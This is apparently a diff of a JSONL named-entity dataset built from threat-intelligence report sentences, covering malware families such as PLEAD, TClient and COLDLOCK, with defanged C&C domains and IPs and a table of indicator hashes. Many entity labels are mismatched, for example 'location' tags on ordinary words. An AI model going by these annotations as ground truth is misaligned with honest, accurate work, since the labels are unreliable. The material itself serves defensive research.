Outlook, Twitter, Yahoo Mail, Facebook, Gmail, and Chrome The app encrypts all stolen data using RSA and AES encryption algorithms.","entities":[{"id":25188,"label":"location","start_offset":63,"end_offset":66},{"id":25190,"label":"identity","start_offset":114,"end_offset":117},{"id":25191,"label":"location","start_offset":118,"end_offset":121}],"relations":[],"Comments":[]} +{"id":7757,"text":" Figure 18.","entities":[],"relations":[],"Comments":[]} +{"id":4342,"text":"When a file matching one of the listed extensions is found, its MD5 hash is calculated and compared to an exclusion list retrieved from the command-and-control (C&C) server pirnaram[.]xyz.","entities":[{"id":50131,"label":"DOMAIN","start_offset":173,"end_offset":187}],"relations":[],"Comments":[]} +{"id":9099,"text":"Malvertising and poisoning of content-serving application components, such as memcached cache poisoning, were also part of their traffic redirection methods.","entities":[{"id":28095,"label":"location","start_offset":13,"end_offset":16},{"id":28096,"label":"location","start_offset":30,"end_offset":37},{"id":28097,"label":"attack-pattern","start_offset":88,"end_offset":103}],"relations":[],"Comments":[]} +{"id":9702,"text":"However, this key is also scrambled with operation XOR 0x13 followed by ROL 6 operation applied to each byte.","entities":[],"relations":[],"Comments":[]} +{"id":9680,"text":"If clientID equals the following sequence of bytes B4 B1 47 BC 52 28 28 73 1F 1A 01 6B FA 72 C0 73, then the scrambled version is computed using the third parameter (0x10), which is treated as a DWORD.","entities":[],"relations":[],"Comments":[]} +{"id":7529,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} +{"id":1445,"text":" Furthermore, all Android apps published using the same certificate have a trust relationship between them.","entities":[{"id":46771,"label":"SOFTWARE","start_offset":18,"end_offset":25}],"relations":[],"Comments":[]} +{"id":8424,"text":"While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret can pose a severe risk to the Internet when the vendor itself gets compromised.","entities":[{"id":25947,"label":"tools","start_offset":67,"end_offset":73},{"id":25948,"label":"location","start_offset":116,"end_offset":124},{"id":25950,"label":"location","start_offset":193,"end_offset":196},{"id":25951,"label":"location","start_offset":241,"end_offset":247}],"relations":[],"Comments":[]} +{"id":12784,"text":"One of the methods PLEAD operators use to distribute their malware PLEAD\u2019s backdoor can: Harvest saved credentials from browsers and email clients like Outlook List drives, processes, open windows, and files Open remote Shell Upload target file Execute applications via ShellExecute API Delete target file PLEAD also uses the document-targeting exfiltration tool DRIGO, which mainly searches the infected machine for documents.","entities":[{"id":39789,"label":"tools","start_offset":19,"end_offset":24},{"id":39790,"label":"malware","start_offset":67,"end_offset":72},{"id":39791,"label":"location","start_offset":84,"end_offset":87},{"id":39792,"label":"location","start_offset":90,"end_offset":97},{"id":39793,"label":"location","start_offset":130,"end_offset":133},{"id":39794,"label":"location","start_offset":153,"end_offset":160},{"id":39795,"label":"location","start_offset":161,"end_offset":165},{"id":39796,"label":"location","start_offset":199,"end_offset":202},{"id":39797,"label":"location","start_offset":214,"end_offset":220},{"id":39798,"label":"location","start_offset":221,"end_offset":226},{"id":39799,"label":"location","start_offset":234,"end_offset":240},{"id":39800,"label":"location","start_offset":295,"end_offset":301},{"id":39801,"label":"tools","start_offset":308,"end_offset":313},{"id":39802,"label":"location","start_offset":360,"end_offset":364}],"relations":[],"Comments":[]} +{"id":1697,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} +{"id":6452,"text":"Remote Utilities Service The service then communicates with the domain id.remoteutilities.com, which belongs to RemoteUtilities.","entities":[{"id":20082,"label":"malware","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} +{"id":2588,"text":" However, the group\u2019s attacks and leaking of stolen data even without extortion can be very damaging.","entities":[],"relations":[],"Comments":[]} +{"id":6184,"text":"Further investigation revealed that the attacker had modified the victims\u2019 email signatures through malicious code injection.","entities":[{"id":19118,"label":"attack-pattern","start_offset":110,"end_offset":124}],"relations":[],"Comments":[]} +{"id":5759,"text":"The new research expands on previous work into an attack vector known as Rowhammer, first detailed in 2014 Emotet Attack Causes Shutdown of Frankfurt\u2019s IT Network","entities":[{"id":17835,"label":"tools","start_offset":57,"end_offset":63},{"id":17837,"label":"tools","start_offset":107,"end_offset":113}],"relations":[],"Comments":[]} +{"id":5945,"text":"We haven\u2019t retrieved a copy of the exploit.","entities":[],"relations":[],"Comments":[]} +{"id":5939,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} +{"id":11970,"text":"We received leads from Graphika that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} +{"id":9587,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} +{"id":7019,"text":"In 2020 and 2021, Talent-Jump found new samples for malware families that are attributed to the Iron Tiger threat actor, which is also referred to as LuckyMouse, EmissaryPanda, and APT27.","entities":[{"id":21994,"label":"location","start_offset":8,"end_offset":11},{"id":21997,"label":"location","start_offset":74,"end_offset":77},{"id":22000,"label":"location","start_offset":177,"end_offset":180},{"id":22001,"label":"threat-actor","start_offset":181,"end_offset":186}],"relations":[],"Comments":[]} +{"id":5552,"text":"Another option would be to use a browser plug-in like NoScript for Firefox that prevents JavaScript loading from other untrusted sites \u2013 although this won\u2019t prevent you getting potentially stung if the well-known and trusted site you\u2019re on is compromised","entities":[{"id":51541,"label":"SOFTWARE","start_offset":54,"end_offset":74}],"relations":[],"Comments":[]} +{"id":1340,"text":"An example request is shown below.","entities":[],"relations":[],"Comments":[]} +{"id":2558,"text":" In our research, we\u2019re able to outline that Shamoon 2 enters and spreads through an organization in three stages: These stages are outlined in the image below. And that credential theft is a key element in each stage: It\u2019s also worth noting that credentials are a keystone issue in Shamoon 2 wave 2 too: we saw evidence of targeting an organization\u2019s virtual desktop infrastructure (VDI) solutions with default credentials.","entities":[{"id":47755,"label":"threat-actor","start_offset":45,"end_offset":54},{"id":47758,"label":"campaign","start_offset":286,"end_offset":302},{"id":47756,"label":"attack-pattern","start_offset":172,"end_offset":188}],"relations":[{"id":349,"from_id":47758,"to_id":47756,"type":"uses"}],"Comments":[]} +{"id":4203,"text":"Updated the appendix on August 30, 2018 to fix formatting and add new information.","entities":[{"id":50013,"label":"TIME","start_offset":24,"end_offset":39}],"relations":[],"Comments":[]} +{"id":4217,"text":"Initially, a link to a malicious Android application hosted on Google Play that shared the same features as the application described above was present.","entities":[{"id":50031,"label":"SOFTWARE","start_offset":63,"end_offset":74},{"id":50032,"label":"SOFTWARE","start_offset":33,"end_offset":40}],"relations":[],"Comments":[]} +{"id":4251,"text":"While looking into any of the TTimers\u2019 OnTimer methods, we often found a certain kind of structure: A pointer to an encrypted string stored in an EDX register followed by the call to the decryption function.","entities":[],"relations":[],"Comments":[]} +{"id":4618,"text":"This model is triggered when an attacker fetches the credentials using a command-line from within the memory using Mimikatz.","entities":[{"id":50527,"label":"tools","start_offset":115,"end_offset":123}],"relations":[],"Comments":[]} +{"id":8672,"text":"There was no sandbox escape or implant delivered via this exploit.","entities":[],"relations":[],"Comments":[]} +{"id":71,"text":" What\u2019s Next?","entities":[],"relations":[],"Comments":[]} +{"id":4792,"text":"Finally, we urge the United States to lead a diplomatic effort to work with the governments of the countries who harbor problematic vendors, as well as those who employ these tools, to build support for measures that limit harms caused by this industry.","entities":[{"id":50694,"label":"identity","start_offset":21,"end_offset":34}],"relations":[],"Comments":[]} {"id":3,"text":"Once executed by the user the first stage malware downloads and executes the ransomware from a fixed hardcoded server list.","entities":[],"relations":[],"Comments":[]} -{"id":4,"text":" The first known campaign was launched by Crimeware on November 2014.","entities":[{"id":45806,"label":"TIME","start_offset":55,"end_offset":68},{"id":48942,"label":"malware","start_offset":42,"end_offset":51}],"relations":[],"Comments":[]} -{"id":5,"text":"The first stage downloaded the ransomware from these sites:","entities":[],"relations":[],"Comments":[]} -{"id":6,"text":" A very serious campaign was launched between January 19, 2015 and January 20, 2015, and Palo Alto Networks Enterprise Security Platform has discovered more than 1000 unique attacks since.","entities":[{"id":22,"label":"identity","start_offset":90,"end_offset":108},{"id":44570,"label":"TIME","start_offset":46,"end_offset":62},{"id":44571,"label":"TIME","start_offset":67,"end_offset":83}],"relations":[],"Comments":[]} -{"id":7,"text":"The attacker used a polymorphic malware builder to generate malware with a unique hash for each victim, preventing signature-based solutions from detecting the new attacks before it was too late for the victim.","entities":[],"relations":[],"Comments":[]} -{"id":8,"text":"This tactic is a nightmare for legacy security products that are based on legacy techniques such as bytes signatures, since they can only detect attacks after the damage is done instead of preventing it as a true solution should.","entities":[],"relations":[],"Comments":[]} -{"id":9,"text":" Palo Alto Networks Enterprise Security Platform offers multilayer protection to prevent this attack along with other attacks without the need for prior knowledge of the specific attack.","entities":[{"id":31,"label":"identity","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} -{"id":10,"text":" We can see here that server hostnames were changed but they didn’t change the server IP address – see the attached file with results for files from last week’s campaign from VirusTotal.","entities":[{"id":45807,"label":"SOFTWARE","start_offset":175,"end_offset":185}],"relations":[],"Comments":[]} -{"id":11,"text":"Most legacy security programs could not detect this malware at the time it was posted.","entities":[],"relations":[],"Comments":[]} -{"id":12,"text":"If you re-test these hashes again from last week you can see an average of 49\/57 engines that detect last week’s threat – but that’s too little, too late for anyone who already lost data.","entities":[],"relations":[],"Comments":[]} -{"id":13,"text":" This campaign started earlier today, and the malware uses the same techniques and even the same IOCs: And only added two new hostnames:","entities":[{"id":45808,"label":"TIME","start_offset":23,"end_offset":36}],"relations":[],"Comments":[]} -{"id":14,"text":" By now you shouldn’t be surprised that one of them is on the same known malicious IP address.","entities":[],"relations":[],"Comments":[]} -{"id":15,"text":"We found 147 new unique pieces of malware today alone, two of them fully undetectable by the legacy security solutions in VirusTotal and most of them barely detected by one vendor (few have 4\/57 detection rate).","entities":[{"id":44574,"label":"SOFTWARE","start_offset":122,"end_offset":132}],"relations":[],"Comments":[]} -{"id":16,"text":"See below:","entities":[],"relations":[],"Comments":[]} -{"id":17,"text":" So basically you have two choices:","entities":[],"relations":[],"Comments":[]} -{"id":18,"text":" The most surprising fact about this campaign is that almost all the IOCs haven’t been changed: For those still using legacy solutions we’ve attached two lists of SHA256 hashes in a text file format for reference.","entities":[],"relations":[],"Comments":[]} -{"id":19,"text":"One list shows the new campaign, which continues to progress.","entities":[],"relations":[],"Comments":[]} -{"id":20,"text":"The other list is of last week’s campaign by the same attackers (exhaustive or close to it). Palo Alto Networks Enterprise Security Platform would have stopped this ransomware attack campaign thanks to the platform’s unique integration between the network, endpoint and the cloud to maximize security.","entities":[{"id":45809,"label":"identity","start_offset":94,"end_offset":112}],"relations":[],"Comments":[]} -{"id":21,"text":"Attacks aren't getting any less sophisticated, so it is time to leave legacy security solutions behind and upgrade to real, prevention-based security.","entities":[],"relations":[],"Comments":[]} -{"id":22,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":23,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":24,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":25,"text":"This post is also available in: 日本語 (Japanese) Over the past six months, we’ve seen a major increase in the number of attack campaigns with the ultimate goal of mining cryptocurrency.","entities":[],"relations":[],"Comments":[]} -{"id":26,"text":"It’s a subject Unit 42 has been tracking in the past year:","entities":[{"id":45810,"label":"identity","start_offset":15,"end_offset":22}],"relations":[],"Comments":[]} -{"id":27,"text":" So, what is driving a widespread shift from attackers and creating a significant trend in the industry?","entities":[],"relations":[],"Comments":[]} -{"id":28,"text":"There are three factors at work:","entities":[],"relations":[],"Comments":[]} -{"id":29,"text":" To answer the question in more detail, it’s important to put yourself into the criminal’s shoes and consider what alternative routes they have to monetize infections.","entities":[],"relations":[],"Comments":[]} -{"id":30,"text":"In this brief, we’ll share how this trend came to fruition, why it’s so prevalent, and how security professionals and defenders can keep an eye out for this rising type of threat.","entities":[],"relations":[],"Comments":[]} -{"id":31,"text":" How Attacks Monetize Infections","entities":[],"relations":[],"Comments":[]} -{"id":32,"text":"While targeted attacks gain the most attention from researchers and media, the majority of malware infections are untargeted and even indiscriminate.","entities":[],"relations":[],"Comments":[]} -{"id":33,"text":"Instead of seeking out specific targets, many criminals aim to infect as many systems as possible and then turn those infections into cash.","entities":[],"relations":[],"Comments":[]} -{"id":34,"text":"This has been true for over a decade, although the mechanisms available to criminals have shifted in that time.","entities":[],"relations":[],"Comments":[]} -{"id":35,"text":"To understand where we are now, it helps to look at how we got here, and to look at the evolution of common cybercriminal activities.","entities":[],"relations":[],"Comments":[]} -{"id":36,"text":"Back in the early 2000s, some of the earliest “botnet herders” made their income by relaying spam emails through infected computers.","entities":[{"id":45768,"label":"attack-pattern","start_offset":93,"end_offset":104},{"id":44575,"label":"TIME","start_offset":12,"end_offset":23}],"relations":[],"Comments":[]} -{"id":37,"text":"Over time, that business became less profitable due to anti-spam controls and ISPs preventing infected systems from directly relaying emails.","entities":[],"relations":[],"Comments":[]} -{"id":38,"text":"In the mid-2000s, criminals made great profits from using Banking Trojans to steal credentials for online banking websites, and subsequently draining the accounts’ associated funds.","entities":[{"id":45811,"label":"TIME","start_offset":7,"end_offset":16},{"id":45812,"label":"attack-pattern","start_offset":77,"end_offset":94}],"relations":[],"Comments":[]} -{"id":39,"text":"This account takeover activity continues today, but various anti-fraud measures and law enforcement actions have made it less profitable and riskier for criminals.","entities":[],"relations":[],"Comments":[]} -{"id":40,"text":"Another aspect of Banking Trojan infections is that, while the criminal may be infecting hosts indiscriminately, the value of the host greatly depends on the individual who owns it, and the criminals’ ability to “cash out” their bank account.","entities":[],"relations":[],"Comments":[]} -{"id":41,"text":"Figure 1 is a capture from a book I wrote with some colleagues in 2008, “Cyber Fraud: Tactics, Techniques, and Procedures.”","entities":[{"id":51804,"label":"TIME","start_offset":66,"end_offset":70}],"relations":[],"Comments":[]} -{"id":42,"text":"It shows the price that a criminal enterprise called IFRAME DOLLARS was charging to infect computers in various countries at that time.","entities":[{"id":44577,"label":"threat-actor","start_offset":53,"end_offset":67}],"relations":[],"Comments":[]} -{"id":43,"text":"Figure 1: Capture from Cyber Fraud: Tactics, Techniques, and Procedures showing prices of host infections by country.","entities":[],"relations":[],"Comments":[]} -{"id":44,"text":"In 2007, the infection of a system in Australia went for US$0.60, while an infection in Poland was only a fraction of the cost, at US$0.096.","entities":[{"id":45814,"label":"location","start_offset":38,"end_offset":48},{"id":45815,"label":"location","start_offset":88,"end_offset":94},{"id":45813,"label":"TIME","start_offset":3,"end_offset":7}],"relations":[],"Comments":[]} -{"id":45,"text":"The difference in price represented the difference in value: criminals were able to make more money through a Banking Trojan account takeover from an Australian infection than they could in Poland.","entities":[{"id":45771,"label":"malware","start_offset":110,"end_offset":124},{"id":45772,"label":"attack-pattern","start_offset":125,"end_offset":141},{"id":44579,"label":"location","start_offset":190,"end_offset":196},{"id":44580,"label":"location","start_offset":150,"end_offset":160}],"relations":[],"Comments":[]} -{"id":47,"text":"As anti-fraud protections evolved, so did the criminals.","entities":[],"relations":[],"Comments":[]} -{"id":48,"text":"Fast forward five years to 2013 and the rise of the Ransomware business model","entities":[{"id":44581,"label":"TIME","start_offset":27,"end_offset":31}],"relations":[],"Comments":[]} -{"id":49,"text":"This new way to generate profit had two major advantages over account takeovers: ","entities":[],"relations":[],"Comments":[]} -{"id":50,"text":"Put another way, the ransomware model represented both increased efficiency and decreased risk in monetizing the infection.","entities":[],"relations":[],"Comments":[]} -{"id":51,"text":"Anyone who’s been paying attention to cybercrime since 2013 is aware of the ransomware surge, infecting systems throughout the world and plaguing networks’ administrators.","entities":[{"id":44582,"label":"TIME","start_offset":55,"end_offset":59}],"relations":[],"Comments":[]} -{"id":52,"text":"While only a tiny fraction (possibly 1 in 1000) of systems infected with a banking Trojan pay out for attackers, a much higher portion of ransomware victims pay to get their files back.","entities":[],"relations":[],"Comments":[]} +{"id":3002,"text":"But home entertainment isn\u2019t just the physical devices.","entities":[],"relations":[],"Comments":[]} +{"id":10471,"text":"ALIEN lives inside multiple privileged processes and receives commands from PREDATOR over IPC.","entities":[{"id":31841,"label":"malware","start_offset":0,"end_offset":5},{"id":31842,"label":"location","start_offset":49,"end_offset":52}],"relations":[],"Comments":[]} +{"id":11067,"text":"We terminated 9 YouTube channels as part of our investigation into a coordinated influence operation linked to Egypt.","entities":[],"relations":[],"Comments":[]} +{"id":1637,"text":"Between the two of these developers they have produced five applications, and we\u2019ve found that every one of them contains the Funtasy Trojan.","entities":[{"id":46861,"label":"malware","start_offset":126,"end_offset":133}],"relations":[],"Comments":[]} +{"id":13273,"text":"Comparison of TClient\u2019s configuration format in 2016 (left, from other researchers) and 2018 (right) TClient will use SSL to connect to Tropic Trooper\u2019s C&C server.","entities":[{"id":41350,"label":"malware","start_offset":14,"end_offset":21},{"id":41352,"label":"location","start_offset":84,"end_offset":87},{"id":41354,"label":"malware","start_offset":101,"end_offset":108},{"id":41355,"label":"location","start_offset":109,"end_offset":113},{"id":41356,"label":"location","start_offset":118,"end_offset":121}],"relations":[],"Comments":[]} +{"id":14411,"text":" This is where adding network intelligence to an XDR and correlating with other intelligence from different areas of the network can be most beneficial.","entities":[{"id":47169,"label":"SOFTWARE","start_offset":51,"end_offset":55}],"relations":[],"Comments":[]} +{"id":3124,"text":" Why should I care, what can it do to me?","entities":[],"relations":[],"Comments":[]} +{"id":4513,"text":"For Android, through its entire development lifecycle, we subject the products to a rigorous security program.","entities":[{"id":50313,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} +{"id":1915,"text":"Figure 2. Comparison of legitimate Threema code (left) to the modified version (right) with the inserted code","entities":[{"id":47036,"label":"SOFTWARE","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} +{"id":2133,"text":"There are no known active attacks at this time and the current requirement that two, non-default conditions need to be met for the vulnerability to be exploitable makes for a different threat environment.","entities":[],"relations":[],"Comments":[]} +{"id":2617,"text":"Most notably, their focus to date does not appear to have been on extortion and financial gain.","entities":[],"relations":[],"Comments":[]} +{"id":8607,"text":"Since mid-August, OpenSUpdater samples have carried an invalid signature, and further investigation showed this was a deliberate attempt to evade detection.","entities":[{"id":26605,"label":"malware","start_offset":18,"end_offset":30},{"id":26606,"label":"location","start_offset":74,"end_offset":77}],"relations":[],"Comments":[]} +{"id":6760,"text":"A brief history of Gamaredon In 2015, researchers from LookingGlass published the first report on Gamaredon.","entities":[],"relations":[],"Comments":[]} +{"id":9137,"text":"The mechanisms of redirections were different for each intermediate victim.","entities":[],"relations":[],"Comments":[]} +{"id":13359,"text":"Possible link to Chinese espionage","entities":[],"relations":[],"Comments":[]} +{"id":4258,"text":"This algorithm was previously discussed by security researchers in a Confucius-related blog post.","entities":[{"id":50054,"label":"threat-actor","start_offset":69,"end_offset":78}],"relations":[],"Comments":[]} +{"id":2458,"text":"At this time, we have yet to confirm any successful exploitation attempts that led to a webshell installed onto the server outside of testing activity using purposefully vulnerable applications.","entities":[],"relations":[],"Comments":[]} +{"id":394,"text":" Below are details of what was seen in the attempt.","entities":[],"relations":[],"Comments":[]} +{"id":6343,"text":"The following table shows a side-by-side comparison of Roshan_CV.ISO and that of a previously identified APT29 sample (Decret.ISO).","entities":[{"id":19700,"label":"location","start_offset":69,"end_offset":72},{"id":19701,"label":"threat-actor","start_offset":105,"end_offset":110},{"id":19702,"label":"location","start_offset":111,"end_offset":117}],"relations":[],"Comments":[]} +{"id":13276,"text":"TClient is actually one of Tropic Trooper\u2019s other backdoors.","entities":[{"id":41362,"label":"malware","start_offset":0,"end_offset":7},{"id":41363,"label":"location","start_offset":20,"end_offset":23}],"relations":[],"Comments":[]} +{"id":787,"text":"To reduce the impact of the deferred free patch, a research may consider patching the mshtml.dll in memory.","entities":[{"id":46349,"label":"FILEPATH","start_offset":86,"end_offset":96}],"relations":[],"Comments":[]} +{"id":5297,"text":"These include the hard-coded C&C servers and the interval that should be used to communicate with the C&C servers.","entities":[],"relations":[],"Comments":[]} +{"id":10865,"text":" This component includes definition of an initial C&C server.","entities":[],"relations":[],"Comments":[]} +{"id":14200,"text":" Tags Expert Perspective | Web | Exploits & Vulnerabilities | Cyber Threats | APT & Targeted Attacks | Articles, News, Reports | Network","entities":[],"relations":[],"Comments":[]} +{"id":1643,"text":" Researchers interested in investigating them further can find more information in the table below.","entities":[],"relations":[],"Comments":[]} +{"id":13839,"text":"Conclusion","entities":[],"relations":[],"Comments":[]} +{"id":2336,"text":"An N-day is a known vulnerability with a publicly available patch.","entities":[],"relations":[],"Comments":[]} +{"id":13575,"text":"The script hooks the mouse click event.","entities":[{"id":42322,"label":"attack-pattern","start_offset":11,"end_offset":16}],"relations":[],"Comments":[]} +{"id":12971,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} +{"id":9845,"text":"While steganography is always used as part of TICK\u2019s malware techniques, we found that the group used a more sophisticated steganography technique in this campaign.","entities":[{"id":30009,"label":"threat-actor","start_offset":46,"end_offset":50},{"id":30010,"label":"location","start_offset":155,"end_offset":163}],"relations":[],"Comments":[]} +{"id":14354,"text":"Between June and December 2017, the Android variant had the following alterations: C&C server was changed to 192[.]169[.]217[.]55, the ability to record phone calls was removed, and the C&C server was again changed to 198[.]12[.]149[.]13.","entities":[{"id":51793,"label":"SOFTWARE","start_offset":36,"end_offset":43},{"id":51792,"label":"TIME","start_offset":17,"end_offset":30},{"id":51791,"label":"TIME","start_offset":8,"end_offset":12},{"id":44343,"label":"IPV4","start_offset":109,"end_offset":129},{"id":44345,"label":"IPV4","start_offset":218,"end_offset":237}],"relations":[],"Comments":[]} +{"id":2143,"text":"On May 27, 2022, details began to emerge of malicious Word documents leveraging remote templates to execute PowerShell via the ms-msdt Office URL protocol.","entities":[{"id":47274,"label":"tools","start_offset":108,"end_offset":118},{"id":47275,"label":"TIME","start_offset":3,"end_offset":15},{"id":47276,"label":"SOFTWARE","start_offset":54,"end_offset":59}],"relations":[],"Comments":[]} +{"id":1157,"text":"And, as can be quickly verified by searching through standard virus detection logs, the mutexes did in fact appear in the hypothesized order.","entities":[],"relations":[],"Comments":[]} +{"id":8097,"text":" Figure 1. The three apps related to SideWinder group Figure 2.","entities":[],"relations":[],"Comments":[]} +{"id":1602,"text":" Figure 2: Remote control app requests complete control over your SMS messages.","entities":[],"relations":[],"Comments":[]} +{"id":3146,"text":"That means the vast majority of its feature enhancements and new services are directly driven from their input.","entities":[],"relations":[],"Comments":[]} +{"id":4295,"text":"Separating the network into individual parts, as well as restricting access to only those who really need it, can mitigate the damage that occurs in case of a successful attack.","entities":[],"relations":[],"Comments":[]} +{"id":7116,"text":"All the requests were sent to the C&C server on port 443, with \u201c\/ajax\u201d as the uniform resource identifier (URI).","entities":[],"relations":[],"Comments":[]} +{"id":3051,"text":" \u201cAntiVirus for Android\u2122\u201d was developed by a company named \u201cCTG Network Ltd.","entities":[{"id":45759,"label":"malware","start_offset":3,"end_offset":24},{"id":45760,"label":"identity","start_offset":61,"end_offset":77}],"relations":[],"Comments":[]} +{"id":1281,"text":"We\u2019ve named this tool \u201cFormerFirstRAT\u201d as it appears to be the names used by the developers to refer to their creations.","entities":[{"id":44966,"label":"malware","start_offset":23,"end_offset":37}],"relations":[],"Comments":[]} +{"id":13369,"text":" Indicators of Compromise SHA 256 Malware Family 2367326f995cb911c72baadc33a3155f8f674600 NTDSDump 75e49120a0238749827196cebb7559a37a2422f8 COLDLOCK 5b9b7fb59f0613c32650e8a3b91067079bcb2fc2 COLDLOCK e7aa8f55148b4548ef1ab9744bc3d0e67588d5b7 COLDLOCK ad6783c349e98c2b4a8ce0b5c9207611309adca7 COBALTSTRIKE 29cc0ff619f54068ce0ab34e8ed3919d13fa5ee9 COLDLOCK 2051f0a253eced030539a10ebc3e6869b727b8a9 COLDLOCK a2046f17ec4f5517636ea331141a4b5423d534f0 COLDLOCK 03589dffe2ab72a0de5e9dce61b07e44a983d857 COBALTSTRIKE 9d6feb6e246557f57d17b8df2b6d07194ad66f66 COLDLOCK 28d172e374eebc29911f2152b470528fc695662e PWDDUMPER 574fb6a497c032f7b9df54bc4669d1eb58d78fb4 ASPSHELL *One of the sources for this table is the original report from the U.S. Justice Department Tags Latest News | APT & Targeted Attacks | Endpoints | Cyber Crime | Network | Articles, News, Reports","entities":[{"id":41581,"label":"SHA1","start_offset":91,"end_offset":131},{"id":41582,"label":"malware","start_offset":132,"end_offset":140},{"id":41583,"label":"SHA1","start_offset":141,"end_offset":181},{"id":41584,"label":"malware","start_offset":182,"end_offset":190},{"id":41585,"label":"SHA1","start_offset":191,"end_offset":231},{"id":41586,"label":"malware","start_offset":232,"end_offset":240},{"id":41587,"label":"SHA1","start_offset":241,"end_offset":281},{"id":41588,"label":"malware","start_offset":282,"end_offset":290},{"id":41589,"label":"MD5","start_offset":291,"end_offset":331},{"id":41590,"label":"SHA1","start_offset":345,"end_offset":385},{"id":41591,"label":"malware","start_offset":386,"end_offset":394},{"id":41592,"label":"SHA1","start_offset":395,"end_offset":435},{"id":41593,"label":"malware","start_offset":436,"end_offset":444},{"id":41594,"label":"SHA1","start_offset":445,"end_offset":485},{"id":41595,"label":"malware","start_offset":486,"end_offset":494},{"id":41596,"label":"SHA1","start_offset":495,"end_offset":535},{"id":41597,"label":"SHA1","start_offset":549,"end_offset":589},{"id":41598,"label":"malware","start_offset":590,"end_offset":598},{"id":41599,"label":"SHA1","start_offset":599,"end_offset":639},{"id":41600,"label":"SHA1","start_offset":650,"end_offset":690},{"id":41601,"label":"location","start_offset":702,"end_offset":705},{"id":41602,"label":"location","start_offset":773,"end_offset":780},{"id":41603,"label":"location","start_offset":816,"end_offset":819}],"relations":[],"Comments":[]} +{"id":13703,"text":" In the case discussed here, the attacker email itself does not include the typical malware payload of malicious attachments.","entities":[],"relations":[],"Comments":[]} +{"id":1879,"text":"Indicators of Compromise (IOCs) File SHA256 Detection Malicious batch file component a5ad3355f55e1a15baefea83ce81d038531af516f47716018b1dedf04f081f15","entities":[{"id":5521,"label":"SHA1","start_offset":91,"end_offset":155}],"relations":[],"Comments":[]} +{"id":1957,"text":"It also protects devices from attacks that leverage vulnerabilities, preventing unauthorized access to apps, as well as detecting and blocking malware and fraudulent websites.","entities":[],"relations":[],"Comments":[]} +{"id":4634,"text":"This post will provide technical details about HYPERSCRAPE, similar to PWC\u2019s recently published analysis on a Telegram grabber tool.","entities":[{"id":50552,"label":"malware","start_offset":47,"end_offset":58},{"id":50554,"label":"SOFTWARE","start_offset":110,"end_offset":118},{"id":50553,"label":"identity","start_offset":71,"end_offset":74}],"relations":[],"Comments":[]} +{"id":737,"text":"Palo Alto Networks Azure-based VM and CN Series Firewall instances do not use the OMI package and are not vulnerable to the OMI critical vulnerabilities.","entities":[{"id":46331,"label":"SOFTWARE","start_offset":82,"end_offset":85},{"id":46330,"label":"SOFTWARE","start_offset":19,"end_offset":24},{"id":46329,"label":"identity","start_offset":0,"end_offset":18},{"id":46332,"label":"SOFTWARE","start_offset":124,"end_offset":127}],"relations":[],"Comments":[]} +{"id":13082,"text":" Tags Cloud | Malware | Expert Perspective | APT & Targeted Attacks | IoT | Ransomware |","entities":[],"relations":[],"Comments":[]} +{"id":1120,"text":" What quickly becomes apparent is that a large majority of the mutexes provide no obvious means to automatically classify them as necessarily indicative of good or bad behavior.","entities":[],"relations":[],"Comments":[]} +{"id":1853,"text":" Figure 22. XenArmor password recovery tool execution ","entities":[{"id":46983,"label":"tools","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} +{"id":2172,"text":" Based on the amount of publicly available information, the ease of use and the extreme effectiveness of this exploit, Palo Alto Networks highly recommends following Microsoft\u2019s guidance to protect your enterprise until a patch is issued to fix the problem.","entities":[{"id":45410,"label":"identity","start_offset":119,"end_offset":137},{"id":45411,"label":"identity","start_offset":166,"end_offset":175}],"relations":[],"Comments":[]} +{"id":5466,"text":"The commands in their backdoors do resemble each other.","entities":[],"relations":[],"Comments":[]} +{"id":4018,"text":" We observed that the group tried to access some internal documents (such as flight schedules and documents for financial plans) and personal information on the compromised hosts (such as search histories).","entities":[],"relations":[],"Comments":[]} +{"id":4662,"text":"If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.","entities":[],"relations":[],"Comments":[]} +{"id":8492,"text":"How to do that?","entities":[],"relations":[],"Comments":[]} +{"id":5099,"text":"We did not recover any responses from those URLs.","entities":[],"relations":[],"Comments":[]} +{"id":1109,"text":" As is equally obvious, not all mutexes offer such dramatic insight.","entities":[],"relations":[],"Comments":[]} +{"id":14415,"text":"Some recent RYUK ransomware attacks are a good example.","entities":[{"id":47171,"label":"malware","start_offset":12,"end_offset":17}],"relations":[],"Comments":[]} +{"id":9163,"text":"2016: Lurk\u2019s Downfall Lurk\u2019s active compromise of financial institutions led to a series of enquiries that culminated in the arrest of over 50 individuals involved in its operations across Russia.","entities":[],"relations":[],"Comments":[]} +{"id":2391,"text":"But because Earth Baku has updated its toolset with StealthVector, StealthMutant, and ScrambleCross for this new campaign, we have identified it as its own separate operation.","entities":[{"id":45488,"label":"threat-actor","start_offset":12,"end_offset":22},{"id":45490,"label":"malware","start_offset":52,"end_offset":65},{"id":45491,"label":"malware","start_offset":67,"end_offset":80},{"id":45492,"label":"malware","start_offset":86,"end_offset":99}],"relations":[{"id":102,"from_id":45488,"to_id":45491,"type":"uses"},{"id":103,"from_id":45488,"to_id":45492,"type":"uses"},{"id":101,"from_id":45488,"to_id":45490,"type":"uses"}],"Comments":[]} +{"id":13521,"text":" Tags APT & Targeted Attacks | Cyber Crime | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} +{"id":9310,"text":"Billing address (zip code) Table 1.","entities":[],"relations":[],"Comments":[]} +{"id":7817,"text":"Trend Micro\u2122 Hosted Email 